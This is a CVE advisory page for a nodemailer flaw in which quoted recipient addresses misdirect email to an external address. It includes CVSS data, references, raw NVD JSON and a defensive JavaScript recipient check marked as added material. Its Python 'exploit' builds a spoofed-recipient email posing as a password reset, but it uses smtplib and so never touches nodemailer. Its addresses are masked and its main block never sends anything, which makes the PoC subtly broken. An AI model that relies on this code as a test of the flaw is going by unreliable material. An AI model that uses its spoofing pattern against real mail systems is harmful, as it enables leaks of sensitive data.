Security Vulnerability Report
CVE-2025-13033 CVSS 7.5 HIGH

CVE-2025-13033

Published: 2025-11-14 20:15:46
Last Modified: 2026-05-11 13:16:10

Description

A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

nodemailer < fixed version
Other applications that use the affected email address parser

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-13033 PoC - Email Address Misdirection
# This PoC demonstrates how an attacker can exploit the email parsing vulnerability
# to redirect emails to an external address

import smtplib
from email.mime.text import MIMEText
from email.header import Header


def create_malicious_email():
    """
    Create a malicious email with spoofed recipient address.
    The parsing vulnerability causes the email to be sent to the
    attacker-controlled external address instead of the intended internal recipient.
    """
    # Malicious recipient format that exploits the parsing vulnerability
    # Format: "[email protected]" <[email protected]>
    # The parser incorrectly extracts [email protected] as the actual recipient
    malicious_recipient = '"[email protected]" <[email protected]>'

    # Attacker-controlled email address that will receive the redirected emails
    attacker_email = '[email protected]'

    msg = MIMEText('Sensitive internal data or authentication credentials', 'plain', 'utf-8')
    msg['From'] = Header('[email protected]')
    msg['To'] = Header(malicious_recipient)  # Exploits the vulnerability
    msg['Subject'] = Header('Password Reset Request')

    return msg


def send_exploit_email(smtp_server, smtp_port, from_addr, to_addr, msg):
    """
    Send the malicious email through the SMTP server.
    """
    try:
        with smtplib.SMTP(smtp_server, smtp_port) as server:
            server.sendmail(from_addr, [to_addr], msg.as_string())
            print("[+] Malicious email sent successfully")
            print("[+] Target internal address was spoofed")
            print(f"[+] Email was redirected to attacker: {to_addr}")
    except Exception as e:
        print(f"[-] Error sending email: {e}")


# Example usage
if __name__ == '__main__':
    msg = create_malicious_email()
    # In real attack scenario, attacker would send this through target's mail server
    print("PoC demonstrates email misdirection vulnerability CVE-2025-13033")
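The description above and the PoC come down to one parsing ambiguity: a recipient value whose quoted display name is itself an email address at a domain other than the one inside the angle brackets. The following is an added, defender-side example that is not part of this report and not nodemailer's code: a strict recipient check for an application that sends mail through such a library. It parses only two shapes (a quoted display name followed by an angle-addr, or a bare addr-spec), takes the angle-bracket addr-spec as the sole delivery target, enforces an allowlist of internal domains, and rejects the suspicious shape in which the display name is an address at a different domain, so the value never reaches the library's parser. The domain names, addresses and the `INTERNAL_DOMAINS` allowlist are constructed placeholders, and the grammar is a deliberate subset of RFC 5322, not a replacement for a full parser.

```javascript
// Added example (not from the report or from nodemailer): strict recipient validation
// performed before a value is handed to a mail library.
// Accepted shapes:  "Display Name" <local@domain>   or   local@domain   or   <local@domain>
// Anything else is rejected rather than guessed at.

// Constructed allowlist of domains this application is allowed to deliver to.
const INTERNAL_DOMAINS = new Set(['internal.example']);

// Simplified addr-spec: dot-atom local part, at least one dotted label, alphabetic TLD.
const ADDR_SPEC = /^[A-Za-z0-9._%+-]+@([A-Za-z0-9-]+\.)+[A-Za-z]{2,}$/;

// Parse one recipient header value into { name, addr }.
// Returns null when the value does not match one of the accepted shapes.
function parseRecipient(value) {
  const s = value.trim();
  // "quoted display name" <addr-spec>; quoted-pair escapes allowed inside the quotes
  const quoted = s.match(/^"((?:[^"\\]|\\.)*)"\s*<([^<>]+)>$/);
  if (quoted) {
    const addr = quoted[2].trim();
    return ADDR_SPEC.test(addr) ? { name: quoted[1], addr } : null;
  }
  // bare addr-spec, optionally wrapped in angle brackets; no whitespace, quotes or commas
  const bare = s.match(/^<?([^<>"\s,]+)>?$/);
  if (bare && ADDR_SPEC.test(bare[1])) return { name: '', addr: bare[1] };
  return null;
}

function domainOf(addr) {
  return addr.slice(addr.lastIndexOf('@') + 1).toLowerCase();
}

// Decide whether a recipient value may be delivered to.
// Returns { ok, reason, addr } so callers can log the reason on rejection.
function checkRecipient(value) {
  const parsed = parseRecipient(value);
  if (!parsed) return { ok: false, reason: 'unparseable recipient', addr: null };
  const { name, addr } = parsed;

  // Only the addr-spec decides delivery; it must be an internal domain.
  if (!INTERNAL_DOMAINS.has(domainOf(addr))) {
    return { ok: false, reason: 'external domain', addr };
  }
  // The shape this CVE describes: a display name that is itself an address at a
  // different domain. Reject it rather than rely on how a downstream parser reads it.
  if (ADDR_SPEC.test(name) && domainOf(name) !== domainOf(addr)) {
    return { ok: false, reason: 'display name is an address at a different domain', addr };
  }
  return { ok: true, reason: 'ok', addr };
}

// Constructed sample values for a stand-alone run.
const SAMPLES = [
  '"Alice Example" <alice@internal.example>',
  'bob@internal.example',
  '"mallory@attacker.example" <alice@internal.example>',
  '"alice@internal.example" <mallory@attacker.example>',
  'alice@internal.example, mallory@attacker.example',
];

for (const value of SAMPLES) {
  const result = checkRecipient(value);
  console.log(`${result.ok ? 'ACCEPT' : 'REJECT'}  ${JSON.stringify(value)}  (${result.reason})`);
}
```

The check is intentionally conservative: a value containing several addresses, or any shape outside the two accepted ones, is rejected and logged rather than split heuristically. The "display name is an address at a different domain" rejection is the detection signal worth alerting on in application logs, since a legitimate sender has little reason to send that shape.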

References

https://access.redhat.com/errata/RHSA-2026:15979
https://access.redhat.com/errata/RHSA-2026:3751
https://access.redhat.com/security/cve/CVE-2025-13033
https://bugzilla.redhat.com/show_bug.cgi?id=2402179
https://github.com/nodemailer/nodemailer
https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626
https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13033",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-14T20:15:45.957",
    "lastModified": "2026-05-11T13:16:10.037",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A vulnerability was identified in the email parsing library due to improper handling of specially formatted recipient email addresses. An attacker can exploit this flaw by crafting a recipient address that embeds an external address within quotes. This causes the application to misdirect the email to the attacker's external address instead of the intended internal recipient. This could lead to a significant data leak of sensitive information and allow an attacker to bypass security filters and access controls."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-1286"}
        ]
      }
    ],
    "references": [
      {"url": "https://access.redhat.com/errata/RHSA-2026:15979", "source": "[email protected]"},
      {"url": "https://access.redhat.com/errata/RHSA-2026:3751", "source": "[email protected]"},
      {"url": "https://access.redhat.com/security/cve/CVE-2025-13033", "source": "[email protected]"},
      {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402179", "source": "[email protected]"},
      {"url": "https://github.com/nodemailer/nodemailer", "source": "[email protected]"},
      {"url": "https://github.com/nodemailer/nodemailer/commit/1150d99fba77280df2cfb1885c43df23109a8626", "source": "[email protected]"},
      {"url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-mm7p-fcc7-pg87", "source": "[email protected]"}
    ]
  }
}